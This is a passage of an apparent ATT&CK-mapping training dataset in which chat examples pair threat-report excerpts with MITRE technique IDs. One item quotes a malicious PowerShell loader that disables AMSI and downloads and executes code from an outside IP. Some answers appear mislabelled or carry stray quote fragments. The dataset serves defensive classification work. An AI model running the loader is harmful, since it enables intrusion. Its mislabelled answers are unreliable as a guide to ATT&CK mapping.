"system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The JavaScript component is the first stage of the attack and can deploy other malware such as a C# spy component, Golden Chickens components or several Python-based tools. The name Evilnum was given to the C# component by other researchers in the past, but the JS component also has been referred to as Evilnum. We have named the group Evilnum as that is the name of their flagship malware, and we’ll refer to the various malware pieces as components" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It looks like GrowlHelper creates an executable named Software Update Check when it thinks it’s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `systeminfo` command to gather details about a compromised system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 spear phishing campaigns have included malicious Word documents with DDE execution." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY has used encrypted strings in its installer." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PowerShell command decodes to the following:$command = 'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACAAIAAgACAAdAByAHkAewAgAAoAIAAgACAAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQAKACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAzADkALgA1ADkALgA0ADYALgAxADUANAA6ADMANAA4ADUALwBJAE0AbwA4AG8AbwBzAGkAZQBWAGEAaQAnACkAOwAKACAAIAAgACAA' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command IEX $exec } else { $exec = [System.Convert]::FromBase64String($command) $exec = [Text.Encoding]::Unicode.GetString($exec) IEX $exec }The script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64 encoded command that decodes to the following:[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} IEX (New-Object Net.WebClient).DownloadString('http:// 139.59.46[.]154:3485 /IMo8oosieVai');This decoded PowerShell script attempts to download and execute a file using HTTP from the URL “hxxp:// 139.59.46[.]154:3485 /IMo8oosieVai”" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zox has the ability to upload files from a targeted system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common by malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered—one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22" }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. The communication occurs via HTTPS over port 443" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device." }, { "role": "assistant", "content": "T1052.001 - Exfiltration over USB" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has used HTTP and HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepyUp: uploads any file to the C&C server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Impacket's wmiexec module can be used to execute commands through WMI." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument." }, { "role": "assistant", "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. Anatomy of the Attack For a number of years targeted attacks have nearly always followed the same modus operandi. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the following example, archives for exfiltration were renamed as .tmp files: move \\\\{FILE PATH}\\c$\\programdata\\AT.part01.rar \\\\{FILE PATH}\\c$\\programdata\\at01.tmp The TMP files were then staged for exfiltration on Internet-facing servers that had previously been compromised with the China Chopper web shell" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ransomware also stops security software-related processes to evade detection and termination of its malicious activities" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mimikatz's \"CRYPTO::Extract\" module can extract keys by interacting with Windows cryptographic application programming interface (API) functions." }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain a list of running processes on the victim’s machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TDTESS provides a reverse shell on the victim." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a new service named “ntssrv” to execute the payload." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has established tmate sessions for C2 communications." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`." }, { "role": "assistant", "content": "T1055.004 - Process Injection: Asynchronous Procedure Call" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest can download and execute payloads in-memory or from disk." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has extracted password hashes from ntds.dit to crack offline." }, { "role": "assistant", "content": "T1110.002 - Brute Force: Password Cracking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Revenge RAT has a plugin for microphone interception." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the implementation of Flagpro v1.0, if a dialog titled “Windows セキュリティ” is displayed when Flagpro accesses to an external site, Flagpro automatically clicks OK button to close the dialog. This handling also works when the dialog is written Chinese and English. It can indicate the targets are Japan, Taiwan, and English-speaking countries. Flagpro v2.0 checks whether both username and password are filled in a dialog as an additional feature before clicking the OK button" }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leveraged a watering hole to serve up malicious code." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle has been obfuscated with a XOR-based algorithm." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "accesses the HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files 60mb and less with these extensions" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap is a kernel-mode rootkit used for cryptocurrency mining." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook." }, { "role": "assistant", "content": "T1556 - Modify Authentication Process" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lastly, the attackers used Comodo code-signing certificates several times during the course of the campaign. Many of the above TTPs are not unique to ITG08, but collectively, and with the use of More_eggs, strengthen the link to this group" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can download files onto compromised hosts." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet schedules a network job to execute two minutes after host infection." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim’s system" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery', 'T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3 outlines the architecture of Crutch version 3. It includes a backdoor that communicates with a hardcoded Dropbox account using the official HTTP API. In some variants, we noticed the presence of recovery C&C channels using either GitHub or a regular domain" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PROMETHIUM has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The location of the working directory is determined by the instructions from the remote server. The directory is used as temporary storage for files containing collected data about the compromised computer" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aquatic Panda has attempted to harvest credentials through LSASS memory dumping." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The QakBot web inject module can inject Java Script into web banking pages visited by the victim." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fysbis has the ability to delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Clambling dropper can use PowerShell to download the malware." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has injected a malicious DLL into the Windows Media Player process (wmplayer.exe)." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Since Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits. The combination of this sustained operational tempo and lack of zero-day exploits may indicate that this group has changed strategy and has decided to attack more frequently and does not have steady access to zero-day exploit code. No matter the strategy, this actor has shown an ability to operate successfully" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains multiple modules for injecting into processes, such as \"Invoke-PSInject\"." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has staged stolen data on designated servers in the target environment." }, { "role": "assistant", "content": "T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rover takes screenshots of the compromised system's desktop and saves them to \"C:\\system\\screenshot.bmp\" for exfiltration every 60 minutes." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent has the ability to set persistence using the Task Scheduler." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets" }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "enumerates directories and obtains file attributes on a system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBK has the ability to download files from C2 to the infected host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Janicab captured audio and sent it out to a C2 server." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Process name, service name, and driver path listings are obtained, and each value is hashed via the FNV-1a + XOR algorithm as described previously and checked against hardcoded blocklists. Some of these hashes have been brute force reversed as part of this analysis, showing that these routines are scanning for analysis tools and antivirus engine components. If a blocklisted process is found the Update routine exits and the sample will continue to try executing the routine until the blocklist passes. Some entries in the service list if found on the system may affect the DGA algorithms behavior in terms of the values generated. The list of stopped services is then bit-packed into the ReportWatcherPostpone key of the appSettings entry for the samples’ config file. The sample retrieves a driver listing via the WMI query Select * From Win32_SystemDriver" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Explosive has a function to download a file to the infected system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar gathers information about local groups and members." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance. They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX. CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN (see Figure 13" }, { "role": "assistant", "content": "T1053.002 - Scheduled Task/Job: At', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": 